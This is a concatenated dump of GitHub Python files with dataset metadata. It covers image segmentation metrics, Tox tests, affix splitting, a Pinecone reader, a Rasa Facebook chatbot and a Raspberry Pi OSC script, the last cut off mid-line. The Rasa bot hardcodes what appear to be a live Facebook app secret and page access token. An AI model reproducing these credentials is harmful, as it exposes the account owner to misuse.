lPoseTime.SetSecondDouble(float(args.pose))\n\n excluded = args.exclude.split(',')\n\n ENV_QUANTIZE = args.quantize\n ENV_FLIP_V = not args.noflipv\n\n Convert(\n args.file,\n args.output,\n excluded,\n 1 / args.framerate,\n lStartTime,\n lDuration,\n lPoseTime,\n args.beautify\n )","repo_name":"jing-ge/myecharts","sub_path":"node_modules/echarts-gl/node_modules/qtek/tools/fbx2gltf.py","file_name":"fbx2gltf.py","file_ext":"py","file_size_in_byte":50151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"9934956615","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef calculate_metrics(ground_truth_mask, segmented_mask):\n intersection = np.logical_and(ground_truth_mask, segmented_mask)\n union = np.logical_or(ground_truth_mask, segmented_mask)\n iou = np.sum(intersection) / np.sum(union)\n pixel_accuracy = np.mean(ground_truth_mask == segmented_mask) * 100\n interweak=np.sum(intersection)\n uniweak=np.sum(union)\n print(interweak)\n print(uniweak)\n return iou, pixel_accuracy\n\ndef segment_image(image_path, ground_truth_mask_path):\n # Load the image\n image = cv2.imread(image_path)\n\n # Load the ground truth mask\n ground_truth_mask = cv2.imread(ground_truth_mask_path, 0)\n\n # Create a mask to initialize the GrabCut algorithm\n mask = np.zeros(image.shape[:2], dtype=np.uint8)\n\n # Define the region of interest (ROI) using the ground truth mask\n rect = cv2.boundingRect(ground_truth_mask)\n\n # Apply GrabCut algorithm to refine the segmentation\n cv2.grabCut(image, mask, rect, None, None, 5, cv2.GC_INIT_WITH_RECT)\n\n # Create a binary mask where sure foreground and probable foreground are marked as 1\n segmented_mask = np.where((mask == cv2.GC_FGD) | (mask == cv2.GC_PR_FGD), 1, 0).astype(np.uint8)\n\n # Calculate IOU and pixel accuracy\n iou, pixel_accuracy = calculate_metrics(ground_truth_mask, segmented_mask)\n\n # Display the original image, ground truth mask, and segmented mask using Matplotlib\n fig, axes = plt.subplots(1, 3, figsize=(12, 4))\n\n axes[0].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n axes[0].set_title(\"Original Image\")\n axes[0].axis(\"off\")\n\n axes[1].imshow(ground_truth_mask, cmap=\"gray\")\n axes[1].set_title(\"Ground Truth Mask\")\n axes[1].axis(\"off\")\n\n axes[2].imshow(segmented_mask, cmap=\"gray\")\n axes[2].set_title(\"Segmented Mask\")\n axes[2].axis(\"off\")\n\n plt.tight_layout()\n plt.show()\n\n print(\"IOU: {:.2f}\".format(iou))\n print(\"Pixel Accuracy: {:.2f}%\".format(pixel_accuracy))\n\n# Provide the path to your image\nimage_path = \"bird.jpg\"\n\n# Provide the path to your ground truth mask\nground_truth_mask_path = \"bird_ground_truth_mask.jpg\"\n\n# Call the segmentation function\nsegment_image(image_path, ground_truth_mask_path)\n","repo_name":"varun123H/Major-Project","sub_path":"weak.py","file_name":"weak.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"73019523976","text":"#!/usr/bin/env python\n\nreadings = [int(row) for row in open('1.input').readlines()]\n\nincrements = 0\nwin_size = 3\nlast = sum(readings[0:win_size])\n\nfor i in range(1, len(readings)):\n win_sum = sum(readings[i:i + win_size])\n if win_sum > last:\n increments += 1\n last = win_sum\n\nprint(increments)\n","repo_name":"creideiki/adventofcode2021","sub_path":"1-2.py","file_name":"1-2.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"30825109194","text":"import unittest\n\nfrom pytox import core\n\n\nclass CoreTest(unittest.TestCase):\n def test_version(self):\n self.assertEqual(len(core.VERSION.split(\".\")), 3)\n\n def test_options(self):\n opts = core.ToxOptions()\n self.assertTrue(opts.ipv6_enabled)\n opts.ipv6_enabled = False\n self.assertFalse(opts.ipv6_enabled)\n\n def test_use_after_free(self):\n opts = core.ToxOptions()\n with self.assertRaises(core.UseAfterFreeException):\n with core.Core(opts) as tox:\n saved_tox = tox\n print(saved_tox.address)\n\n def test_address(self):\n opts = core.ToxOptions()\n with core.Core(opts) as tox:\n self.assertEqual(tox.address, tox.address)\n\n def test_public_key_is_address_prefix(self):\n opts = core.ToxOptions()\n with core.Core(opts) as tox:\n self.assertEqual(\n tox.public_key.hex()[:72] + format(tox.nospam, \"08x\"),\n tox.address[:36].hex(),\n )\n\n def test_public_key_is_not_secret_key(self):\n opts = core.ToxOptions()\n with core.Core(opts) as tox:\n self.assertNotEqual(tox.public_key, tox.secret_key)\n\n def test_savedata_contains_secret_key(self):\n with core.Core() as tox:\n self.assertIn(tox.secret_key, tox.savedata)\n\n def test_set_name(self):\n with core.Core() as tox:\n self.assertEqual(tox.name, b\"\")\n tox.name = b\"iphy\"\n self.assertEqual(tox.name, b\"iphy\")\n\n tox.name = b\"x\" * core.MAX_NAME_LENGTH\n with self.assertRaises(core.ApiException):\n tox.name = b\"x\" * (core.MAX_NAME_LENGTH + 1)\n\n def test_set_status_message(self):\n with core.Core() as tox:\n self.assertEqual(tox.status_message, b\"\")\n tox.status_message = b\"pytox is cool now\"\n self.assertEqual(tox.status_message, b\"pytox is cool now\")\n\n tox.status_message = b\"x\" * core.MAX_STATUS_MESSAGE_LENGTH\n with self.assertRaises(core.ApiException):\n tox.status_message = b\"x\" * (core.MAX_STATUS_MESSAGE_LENGTH +\n 1)\n\n def test_set_status(self):\n with core.Core() as tox:\n self.assertEqual(tox.status, core.TOX_USER_STATUS_NONE)\n tox.status = core.TOX_USER_STATUS_AWAY\n self.assertEqual(tox.status, core.TOX_USER_STATUS_AWAY)\n tox.status = 50 # setting it to an invalid value has no effect\n self.assertEqual(tox.status, core.TOX_USER_STATUS_AWAY)\n\n def test_friend_add(self):\n with core.Core() as tox1:\n with core.Core() as tox2:\n tox1.friend_add(tox2.address, b\"hello there!\")\n tox2.friend_add_norequest(tox1.public_key)\n with self.assertRaises(core.LengthException):\n tox2.friend_add_norequest(tox1.address)\n with self.assertRaises(core.LengthException):\n tox2.friend_add(tox1.public_key, b\"oh no!\")\n\n def test_friend_delete(self):\n with core.Core() as tox1:\n with core.Core() as tox2:\n tox1.friend_add(tox2.address, b\"hello there!\")\n tox1.friend_delete(0)\n with self.assertRaises(core.ApiException):\n # Deleting again: we don't have that friend anymore.\n tox1.friend_delete(0)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"TokTok/py-toxcore-c","sub_path":"test/core_test.py","file_name":"core_test.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"45"} +{"seq_id":"72064722377","text":"from collections import Counter\nfrom collections import defaultdict\nimport os,sys\nimport re, regex\nimport csv\nimport itertools\nimport functools\nimport operator\nfrom copy import deepcopy as copy\nimport sqlite3\nimport numpy as np\nfrom scipy.sparse import csr_matrix as csr\nfrom scipy.sparse.csgraph import connected_components\nimport multiprocessing as MP\nimport time\nimport fasttext\n\n_termfile = sys.argv[1];\n_outfile = sys.argv[2];\n\n_model = 'resources/lid.176.bin';\n\n_threshold_prefix = 0.75#0.8; #TODO: These thresholds might be different for each typ\n_window_prefix = 1;\n_threshold_similar = 0.8#.875; #TODO: Try out what are the best ones for each type!\n_window_similar = 20;\n_distance = 'damerau'; #'edit'\n_and_p_ = 0.0005#0.5#0.6;\n_and_c_ = 0.000000001#0.0001;\n_or_p_ = 0.0003#0.3#0.4;\n_or_c_ = 0.000000001#0.0001;\n\nCNT = 0; TRE = 1; PRO = 2;\n\nWORD = re.compile(r'(\\b[^\\s]+\\b)');\nCHAR = re.compile(r'([A-Za-z]|ß|ö|ü|ä)+');\nLEGAL = regex.compile(r'\\p{L}+')\n\ndef ngrams(seq,n):\n return [tuple(seq[i-n:i]) for i in range(n,len(seq)+1) ];\n\ndef probs_leq(p,c,tree):\n return [(w,w_) for w in tree for w_ in tree[w][TRE] if tree[w][TRE][w_][PRO]>=p and tree[w][PRO]>=c];\n\ndef make_tree(d):\n tree = dict();\n for ngram in d:\n if len(ngram) == 2:\n if ngram[0] in tree:\n tree[ngram[0]][CNT] += d[ngram];\n if ngram[1] in tree[ngram[0]][TRE]:\n tree[ngram[0]][TRE][ngram[1]][CNT] += d[ngram];\n else:\n tree[ngram[0]][TRE][ngram[1]] = [d[ngram],dict(),0];\n else:\n tree[ngram[0]] = [d[ngram],{ngram[1]:[d[ngram],dict(),0]},0];\n divisor = float(sum([tree[w][CNT] for w in tree]));\n for w in tree:\n tree[w][PRO] = tree[w][CNT] / divisor;\n for w_ in tree[w][TRE]:\n tree[w][TRE][w_][PRO] = float(tree[w][TRE][w_][CNT]) / tree[w][CNT];\n return tree;\n\ndef combine_counters(counters):\n c = Counter();\n i = 0;\n for counter in counters:\n i += 1;\n if i % 50 == 0:\n print(i);\n for term in counter:\n c[term] += counter[term];\n return c;\n\ndef display(p,c,tree,inversed=False):\n if inversed:\n for w,w_ in probs_leq(p,c,tree):\n print('(inv)', w_,w, tree[w][CNT], tree[w][TRE][w_][CNT], tree[w][TRE][w_][PRO]);\n else:\n for w,w_ in probs_leq(p,c,tree):\n print('(std)', w,w_, tree[w][CNT], tree[w][TRE][w_][CNT], tree[w][TRE][w_][PRO]);\n\ndef transitive_closure(M): # WARNING: Not for large M!\n labels = connected_components(M)[1];\n closure = csr(labels==labels[:,None]);\n return closure;\n\ndef apply_replace(index2term,replacements):\n if len(replacements) == 0:\n return dict();\n term2index = {index2term[i]:i for i in range(len(index2term))};\n rows,cols,sims = zip(*replacements);\n R = csr((np.ones(2*len(rows)),(rows+cols,cols+rows)),dtype=bool,shape=(len(index2term),len(index2term)));\n labels = connected_components(R)[1];\n sorting = np.argsort(labels);\n labels_s = labels[sorting];\n _, starts = np.unique(labels_s,return_index=True);\n sizes = np.diff(starts);\n groups = [group for group in np.split(sorting,starts[1:]) if group.size > 1];\n replace = dict();\n for group in groups:\n terms = [index2term[i] for i in group];\n repre = max([(d[(term,)],term) for term in terms])[1];\n for term in terms:\n if term != repre:\n replace[term] = repre;\n return replace;\n\ndef replace_by_prefix(index2term,threshold,window):\n replacements = set([]);\n for i in range(len(index2term)-window):\n len_1 = len(index2term[i]);\n for j in range(1,window+1):\n len_2 = len(index2term[i+j]);\n percent = prefix_normed(index2term[i],index2term[i+j],len_1,len_2);\n if percent > threshold:\n replacements.add((i+j,i,percent,));\n return replacements;\n\ndef replace_by_similar(index2term,threshold,window,DIST,compared):\n replacements = set([]);\n manager = MP.Manager();\n tasks = manager.Queue();\n results = manager.Queue();\n T = [];\n for i in range(len(index2term)-window):\n T += [(i+j,i,index2term[i],index2term[i+j],len(index2term[i]),len(index2term[i+j]),threshold,DIST,) for j in range(1,window+1) if not (index2term[i+j],index2term[i],) in compared];\n if len(T) > _batch2:\n compared |= set([(index2term[ij],index2term[i],) for ij,i,term_i,term_ij,len_1,len_2,threshold,DIST in T]);\n tasks.put(T);\n T = [];\n if len(T) != 0:\n tasks.put(T);\n workers = [MP.Process(target=get_similarity_normed,args=(tasks,results,x,)) for x in range(_jobs2)];\n for worker in workers:\n worker.start();\n for x in range(_jobs2):\n result = results.get();\n replacements |= result;\n #print 'Got result', x;\n for x in range(len(workers)):\n workers[x].join();\n #print 'Joined worker', x;\n return replacements, compared;\n\ndef get_similarity_normed(tasks,results,x):\n replacements = set([]);\n while True:\n print(x,'says: Approximate number of jobs in queue:', tasks.qsize());\n try:\n T = tasks.get(timeout=3);\n #print x,'says: Got', len(T), 'tasks to do...';\n except:\n break;\n for ij,i,term_i,term_ij,len_1,len_2,threshold,DIST in T:\n percent = similarity_normed(term_i,term_ij,len_1,len_2,DIST);\n if percent > threshold:\n replacements.add((ij,i,percent,));\n #print x,'says: Done with this set of tasks.';\n #print 'Closing job', x;\n results.put(replacements);\n return 0;\n\ndef prefix_normed(term1,term2,len_1,len_2):\n prefix = os.path.commonprefix([term1,term2]);\n is_prefix = len(prefix)==min([len_1,len_2]);\n return float(len(prefix))/max([len_1,len_2]) if is_prefix else 0.0;\n\ndef is_prefix(term1,term2):\n return term1 == term2[:len(term1)];\n\ndef make_affixes(terms,lookback=10000):\n prefixed = {terms[0]:[(terms[0],0,)]};\n for i in range(len(terms)-1):\n affixes = [];\n pointer = 0;\n for prefix,interval in prefixed[terms[i]]: # and len(terms[i+1])-(pointer+len(prefix)) > 1\n if len(prefix) >= 2 and interval < lookback and is_prefix(prefix,terms[i+1][pointer:]): # reusing previous prefix\n affixes += [(prefix,interval+1,)];\n pointer += len(prefix);\n else:\n break;\n affixes += [(terms[i+1][pointer:],0,)]; # new prefix\n prefixed[terms[i+1]] = affixes;\n return prefixed;\n\ndef similarity_normed(term1,term2,len_1,len_2,DIST):\n distance = damerau_dist(term1,term2) if DIST=='damerau' else edit_dist(term1,term2);\n return 1.-(float(distance)/max([len_1,len_2]));\n\ndef edit_dist(s1,s2):\n if len(s1) > len(s2):\n s1, s2 = s2, s1;\n distances = list(range(len(s1) + 1));\n for i2, c2 in enumerate(s2):\n distances_ = [i2+1];\n for i1, c1 in enumerate(s1):\n if c1 == c2:\n distances_.append(distances[i1]);\n else:\n distances_.append(1 + min((distances[i1], distances[i1 + 1], distances_[-1])));\n distances = distances_;\n return distances[-1];\n\ndef damerau_dist(s1,s2):\n oneago = None;\n thisrow = list(range(1,len(s2)+1))+[0];\n for x in range(len(s1)):\n twoago, oneago, thisrow = oneago, thisrow, [0]*len(s2)+[x + 1];\n for y in range(len(s2)):\n delcost = oneago[y] + 1;\n addcost = thisrow[y-1] + 1;\n subcost = oneago[y-1] + (s1[x]!=s2[y]);\n thisrow[y] = min(delcost,addcost,subcost);\n if (x>0 and y>0 and s1[x]==s2[y-1] and s1[x-1]==s2[y] and s1[x]!=s2[y]):\n thisrow[y] = min(thisrow[y],twoago[y-2]+1);\n return thisrow[len(s2)-1];\n\ndef all_partitions(seq):\n for cutpoints in range(1 << (len(seq)-1)):\n result = []\n lastcut = 0\n for i in range(len(seq)-1):\n if (1< max_score:\n max_score = score;\n max_part = [''.join(partition) for partition in partitioning];\n return max_part;\n\ndef get_replacements(index2term,term2index):\n term2index_ = copy(term2index);\n replace = dict();\n sim_prefix = dict();\n sim_similar = dict();\n num_replace = 99;\n compared = set();\n while num_replace > 0:\n print(1);\n replace_prefix = replace_by_prefix( terms,_threshold_prefix,_window_prefix);\n print(2);\n replace_similar, compared = replace_by_similar(terms,_threshold_similar,_window_similar,_distance,compared);\n #replace_edit = replace_by_similar(terms,_threshold_similar,_window_similar,'edit');\n print(3);\n replace_new = apply_replace(terms,replace_prefix|replace_similar);\n print(4);\n num_replace = len(replace_new);\n print(5);\n only_prefix = [(terms[pair[0]],terms[pair[1]],) for pair in replace_prefix-replace_similar];\n #only_damerau = [(terms[pair[0]],terms[pair[1]],) for pair in replace_similar-replace_edit];\n print(6);\n replace.update(replace_new);\n print(7);\n terms = sorted(list(set([replace[term] if term in replace else term for term in terms])));\n print(8);\n term2index_ = {terms[i]:i for i in range(len(terms))};\n print(num_replace, '(',len(only_prefix),len(compared),')');#, '(',len(only_damerau),')';\n return replace;\n\ndef make_phrases(tree,tree_inv):\n #-------------------------------------------------------------------------------------\n #-right-min-left-min------------------------------------------------------------------\n set_std = set(probs_leq(_and_p_,_and_c_,tree));\n set_inv = set([tuple(reversed(el)) for el in probs_leq(_and_p_,_and_c_,tree_inv)]);\n inter = set_std & set_inv;\n #-------------------------------------------------------------------------------------\n #-right-certain-left-min--------------------------------------------------------------\n set_std_ = set(probs_leq(1.0,_or_c_,tree));\n set_inv_ = set([tuple(reversed(el)) for el in probs_leq(_or_p_,_or_c_,tree_inv)]);\n inter_ = set_std_ & set_inv_;\n #-left-certain-right-min--------------------------------------------------------------\n #-------------------------------------------------------------------------------------\n set_std__ = set(probs_leq(_or_p_,_or_c_,tree));\n set_inv__ = set([tuple(reversed(el)) for el in probs_leq(1.0,_or_c_,tree_inv)]);\n inter__ = set_std__ & set_inv__;\n #-------------------------------------------------------------------------------------\n union = inter | inter_ | inter__;\n #-------------------------------------------------------------------------------------\n #print(union);\n #print(len(inter), '+', len(inter_), '->', len(inter|inter_), '+', len(inter__), '->', len(union));\n return inter, inter_, inter__, union;\n\ndef merge_affixes(affixes_of,inter,inter_,inter__,union):\n affixes_of_ = dict();\n count = 0;\n for term in affixes_of:\n count += 1;\n if count % 1000000 == 0:\n print(count);#break;\n affixes_of_[term] = [];\n current = affixes_of[term][0][0];\n for i in range(len(affixes_of[term])):\n if i == len(affixes_of[term])-1:\n affixes_of_[term] += [current];\n elif not (affixes_of[term][i][0],affixes_of[term][i+1][0],) in union:\n current += affixes_of[term][i+1][0];\n else:\n affixes_of_[term] += [current];\n current = affixes_of[term][i+1][0];\n #print(affixes_of_[term]);\n return affixes_of_;\n\ndef combine_affixes(a,b): #Unfortunately, the result makes no sense either\n a = copy(a); b = copy(b);\n for i in range(len(a)):\n if a[i].endswith('-'):\n a[i] = a[i][:-1];\n for i in range(len(b)):\n if b[i].endswith('-'):\n b[i] = b[i][:-1];\n if len(a[0]) > len(b[0]):\n z = a; a = b; b = z;\n c = [''];\n while len(a) > 0 and len(b) > 0:\n if len(a[0]) > len(b[0]):\n z = a; a = b; b = z; #switch\n c += [a[0]]; #append shorter\n #c[-1] += a[0];\n b[0] = b[0][len(a[0]):]; #shorten longer\n a = a[1:]; #remove shorter\n c += ['']; #start new\n else:\n c[-1] += a[0]; #concatenate shorter\n b[0] = b[0][len(a[0]):]; #shorten longer\n a = a[1:]; #remove shorter\n return [el for el in c if el != ''];\n\ndef show_affixes(term,terms,term2index,affixes_of,affixes_of_inv): #TODO: Not right yet and consider: alt lakonisches vs. altlakonisc hes\n for term in terms[term2index[term]-4:term2index[term]+5]:\n a = [affix[0] for affix in affixes_of [term ]];\n b = [affix[0][::-1] for affix in affixes_of_inv[term[::-1]]][::-1];\n c = combine_affixes(a,b);\n print(' '.join(a)); print(' '.join(b)); print(' '.join(c));\n print('.................................................');\n\ndef sort_terms(terms):\n fmodel = fasttext.load_model(_model);\n lang2terms = defaultdict(list);\n for i in range(len(terms)):\n lang2terms[fmodel.predict(terms[i])[0][0][9:]].append(terms[i]);\n if i % 500000 == 0:\n print(i);\n return lang2terms;\n\nIN = open(_termfile);\nterms = [line.rstrip().strip() for line in IN];\nIN.close();\nindex2term = copy(terms);\nterm2index = {terms[i]:i for i in range(len(terms))};\nlang2terms = sort_terms(terms);\nlerm2index = {lang:{lang2terms[lang][i]:i for i in range(len(lang2terms[lang]))} for lang in lang2terms};\n\ninput('Press ENTER to continue...')\n\naffixes_of = {lang:dict() for lang in lang2terms};\nfor lang in lang2terms:\n affixes_of[lang] = make_affixes(lang2terms[lang],10000);\n\ninput('Press ENTER to continue...')\n\naffixes_of_inv = {lang:dict() for lang in lang2terms};\nfor lang in lang2terms:\n affixes_of_inv[lang] = make_affixes(sorted([term[::-1] for term in lang2terms[lang]]),10000);\n\ninput('Press ENTER to continue...')\n\nagrams = ([(affixes_of[term][i][0],affixes_of[term][i+1][0],) for i in range(len(affixes_of[term])-1)]+[(affixes_of[term][-1][0],None,)] if len(affixes_of[term])>=2 else [(affixes_of[term][-1][0],None,)] for term in affixes_of);\nagrams = [gram for grams in agrams for gram in grams];\nzgrams = ([(affixes_of[term][i+1][0],affixes_of[term][i][0],) for i in range(len(affixes_of[term])-1)]+[(affixes_of[term][0][0],None,)] if len(affixes_of[term])>=2 else [(affixes_of[term][0][0],None,)] for term in affixes_of);\nzgrams = [gram for grams in zgrams for gram in grams];\n\ninput('Press ENTER to continue...')\n\ntree = make_tree(Counter(agrams));\ntree_inv = make_tree(Counter(zgrams));\n\ninput('Press ENTER to continue...')\n\ninter, inter_, inter__, union = make_phrases(tree,tree_inv);\n\ninput('Press ENTER to continue...')\n\naffixes_of_ = merge_affixes(affixes_of,inter,inter_,inter__,union);\n\ninput('Press ENTER to continue...')\n\nfor term in terms[2879500:2879550]:\n print(' '.join((affix[0] for affix in affixes_of [term])));\n print(' '.join((affix for affix in affixes_of_[term])));\n print('................................................');\n\n\n","repo_name":"tobackes/pubdedup","sub_path":"code/split_affixes.py","file_name":"split_affixes.py","file_ext":"py","file_size_in_byte":16198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"29537954952","text":"\"\"\"Pinecone reader.\"\"\"\n\nfrom typing import Any, Dict, List, Optional\n\nfrom llama_index.readers.base import BaseReader\nfrom llama_index.schema import Document\n\n\nclass PineconeReader(BaseReader):\n \"\"\"Pinecone reader.\n\n Args:\n api_key (str): Pinecone API key.\n environment (str): Pinecone environment.\n \"\"\"\n\n def __init__(self, api_key: str, environment: str):\n \"\"\"Initialize with parameters.\"\"\"\n try:\n import pinecone\n except ImportError:\n raise ImportError(\n \"`pinecone` package not found, please run `pip install pinecone-client`\"\n )\n\n self._api_key = api_key\n self._environment = environment\n pinecone.init(api_key=api_key, environment=environment)\n\n def load_data(\n self,\n index_name: str,\n id_to_text_map: Dict[str, str],\n vector: Optional[List[float]],\n top_k: int,\n separate_documents: bool = True,\n include_values: bool = True,\n **query_kwargs: Any\n ) -> List[Document]:\n \"\"\"Load data from Pinecone.\n\n Args:\n index_name (str): Name of the index.\n id_to_text_map (Dict[str, str]): A map from ID's to text.\n separate_documents (Optional[bool]): Whether to return separate\n documents per retrieved entry. Defaults to True.\n vector (List[float]): Query vector.\n top_k (int): Number of results to return.\n include_values (bool): Whether to include the embedding in the response.\n Defaults to True.\n **query_kwargs: Keyword arguments to pass to the query.\n Arguments are the exact same as those found in\n Pinecone's reference documentation for the\n query method.\n\n Returns:\n List[Document]: A list of documents.\n \"\"\"\n import pinecone\n\n index = pinecone.Index(index_name)\n if \"include_values\" not in query_kwargs:\n query_kwargs[\"include_values\"] = True\n response = index.query(top_k=top_k, vector=vector, **query_kwargs)\n\n documents = []\n for match in response.matches:\n if match.id not in id_to_text_map:\n raise ValueError(\"ID not found in id_to_text_map.\")\n text = id_to_text_map[match.id]\n embedding = match.values\n if len(embedding) == 0:\n embedding = None\n documents.append(Document(text=text, embedding=embedding))\n\n if not separate_documents:\n text_list = [doc.get_content() for doc in documents]\n text = \"\\n\\n\".join(text_list)\n documents = [Document(text=text)]\n\n return documents\n","repo_name":"run-llama/llama_index","sub_path":"llama_index/readers/pinecone.py","file_name":"pinecone.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":23993,"dataset":"github-code","pt":"45"} +{"seq_id":"42868293056","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 6 20:09:33 2018\n\n@author: madeline\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom pprint import pprint\nimport csv\nimport cleaning_score_fantasy\n\n\n#read data in\nif __name__ == '__main___':\n\n fantasy_data = pd.read_csv('data\\\\fantasy-data.csv', sep=',', encoding='latin1')\n \n #replace all NAN values (numerical) with true zeroes, since these values\n #are true zeroes\n def clean_int_fan_null(data_frame):\n numeric_attributes = data_frame.columns.tolist()\n non_numeric_list = data_frame.select_dtypes(include=['object']).columns.tolist()\n for item in non_numeric_list:\n numeric_attributes.remove(item)\n \n for item in numeric_attributes:\n data_frame[item].fillna(0, inplace = True)\n return(data_frame)\n \n #remove rows with defensive data aka DST because we are only predicting offensive data \n def clean_fan_position(data_frame):\n offense_data_frame = data_frame[data_frame['Position'].str.len() <= 2]\n return(offense_data_frame)\n \n #remove duplicate rows \n def drop_fan_duplicates(data_frame):\n data_frame.drop_duplicates()\n return(data_frame)\n \n #run cleaning score again\n def fantasy_clean_process(data_frame):\n #run all cleaning functions\n print('running cleaning score...')\n clean_fan_score(data_frame)\n \n print('cleaning ....')\n #drop duplicates\n no_dup = drop_fan_duplicates(data_frame)\n \n #drop defensive positions\n no_def = clean_fan_position(no_dup)\n \n #fill nAns with true zeroes\n final_clean = clean_int_fan_null(no_def)\n \n print('re-running cleaning score... ')\n clean_fan_score(final_clean)\n \n return(final_clean)\n \n #run total process \n fantasy_clean_process(fantasy_data)","repo_name":"madelinenlee/COSC587","sub_path":"fantasy_data_cleaning.py","file_name":"fantasy_data_cleaning.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"29310055521","text":"#list of numbers\nlist1=[10,21,4,15,66,93,1]\neven_count, odd_count =0, 0\n#iterating each number in list\nfor num in list1:\n if num % 2 == 0:\n even_count += 1\n else:\n odd_count += 1\nprint(\"Even numbers in the list: \", even_count) \nprint(\"Odd numbers in the list: \", odd_count)\n\n\n\nmaximum=max(list1)\nprint(maximum)\n\nminimum=min(list1)\nprint(minimum)\n\n\n\n\n\n\n\n# Python program to count and \n# print all palindrome numbers in a list. \n \ndef palindromeNumbers(list_a): \n \n c = 0\n \n # loop till list is not empty \n for i in list_a: \n \n # Find reverse of current number \n t = i \n rev = 0\n while t > 0: \n rev = rev * 10 + t % 10\n t = t // 10\n \n # compare rev with the current number \n if rev == i: \n print (i) \n c = c + 1\n \n print()\n print (\"Total palindrome nos. are\", c )\n print()\n \n# Driver code \ndef main(): \n \n list_a = [10, 121, 133, 155, 141, 252] \n palindromeNumbers(list_a) \n \n list_b = [ 111, 220, 784, 565, 498, 787, 363] \n palindromeNumbers(list_b) \n \nif __name__==\"__main__\": \n main() # main function call ","repo_name":"jyotshna-24/day-4","sub_path":"main (4).py","file_name":"main (4).py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"20552219917","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport logging\nimport warnings\n\nfrom rasa_core import __version__ as rasa_core_version\nfrom rasa_core import utils\nfrom rasa_core.agent import Agent\nfrom rasa_core.channels.console import ConsoleInputChannel\nfrom rasa_core.interpreter import RasaNLUInterpreter\nfrom rasa_core.policies.keras_policy import KerasPolicy\nfrom rasa_core.policies.memoization import MemoizationPolicy\nfrom rasa_core.channels import HttpInputChannel\nfrom rasa_core.channels.facebook import FacebookInput\n\nlogger = logging.getLogger(__name__)\n\ndef train_dialogue(domain_file=\"domain.yml\",\n model_path=\"models/dialogue\",\n training_data_file=\"data/stories.md\"):\n\n agent = Agent(domain_file,\n policies=[MemoizationPolicy(), KerasPolicy()])\n\n agent.train(\n training_data_file,\n max_history=3,\n epochs=1000,\n batch_size=50,\n augmentation_factor=50,\n validation_split=0.2\n )\n\n agent.persist(model_path)\n return agent\n\n\ndef train_nlu():\n from rasa_nlu.converters import load_data\n from rasa_nlu.config import RasaNLUConfig\n from rasa_nlu.model import Trainer\n\n training_data = load_data('data/nlu.json')\n trainer = Trainer(RasaNLUConfig(\"nlu_config.json\"))\n trainer.train(training_data)\n model_directory = trainer.persist('models/nlu/', fixed_model_name=\"current\")\n\n return model_directory\n\ndef run(serve_forever=True):\n interpreter = RasaNLUInterpreter(\"models/nlu/default/current\")\n agent = Agent.load(\"models/dialogue\", interpreter=interpreter)\n\n fb_verify = 'fractal'\n fb_secret = '3db0452e1e4b787d3058e14c624839bc'\n\n fb_tokens = {\n '162871184345992': 'EAAbctRsA3XkBAPeTSd4Q7SKuL0YvINDj30xYquxZC0tJfIZCCzahlDP78D63cTNqpIOQfmeWrnq2B1EFjtf5LHWA7UUQq4imZBSueYtZADcWZARxNWU1kj1SL5dVIn7nxZAj9wZCWmVOZCIkwwU4itzSzu1ZBU41vZC9GJrvbG75i0S5aO7rAYexwt',\n }\n\n input_channel = FacebookInput(\n fb_verify,\n fb_secret,\n fb_tokens,\n True\n )\n\n if serve_forever:\n agent.handle_channel(HttpInputChannel(5000, '/app', input_channel))\n return agent\n\n\nif __name__ == '__main__':\n # utils.configure_colored_logging(loglevel=\"DEBUG\")\n try:\n parser = argparse.ArgumentParser(description='starts the bot')\n\n parser.add_argument(\n 'task',\n choices=[\"train-nlu\", \"train-dialogue\", \"run\"],\n help=\"what the bot should do - e.g. run or train?\")\n task = parser.parse_args().task\n\n # decide what to do based on first parameter of the script\n if task == \"train-nlu\":\n train_nlu()\n elif task == \"train-dialogue\":\n train_dialogue()\n elif task == \"run\":\n run()\n else:\n warnings.warn(\"Need to pass either 'train-nlu', 'train-dialogue' or \"\n \"'run' to use the script.\")\n exit(1)\n except KeyboardInterrupt:\n exit(1)\n","repo_name":"udayallu/rasa-core-ex","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"22875952123","text":"#!/usr/bin/env python2\n\nimport OSC\nimport time\nimport RPi.GPIO as g\nimport multiprocessing as mp\n\nfrom time import sleep\nfrom OSC import OSCServer\n\nfrom pygame import mixer as m\n\nIP = '192.168.0.8'\nPORT = 8000\nc = OSC.OSCClient()\nc.connect((IP, PORT))\n\ng.setmode(g.BOARD)\ng.setwarnings(False)\nMATRIX = [[1, 2, 3, 'A'],\n [4, 5, 6, 'B'],\n [7, 8, 9, 'C'],\n ['*', 0, '#', 'D']]\n\n\nROW = [7, 11, 13, 15]\nCOL = [12, 16, 18, 22]\nCODE = '793'\n\n\nLOCK = 37\nPOWER = 38\nBUTTON = 40\nBUTTONLIGHT = 8\nRADIORELAY = 26\ng.setup(POWER, g.IN, pull_up_down=g.PUD_UP)\ng.setup(LOCK, g.IN, pull_up_down=g.PUD_UP)\ng.setup(BUTTON, g.IN, pull_up_down=g.PUD_UP)\ng.setup(RADIORELAY, g.OUT)\ng.setup(BUTTONLIGHT, 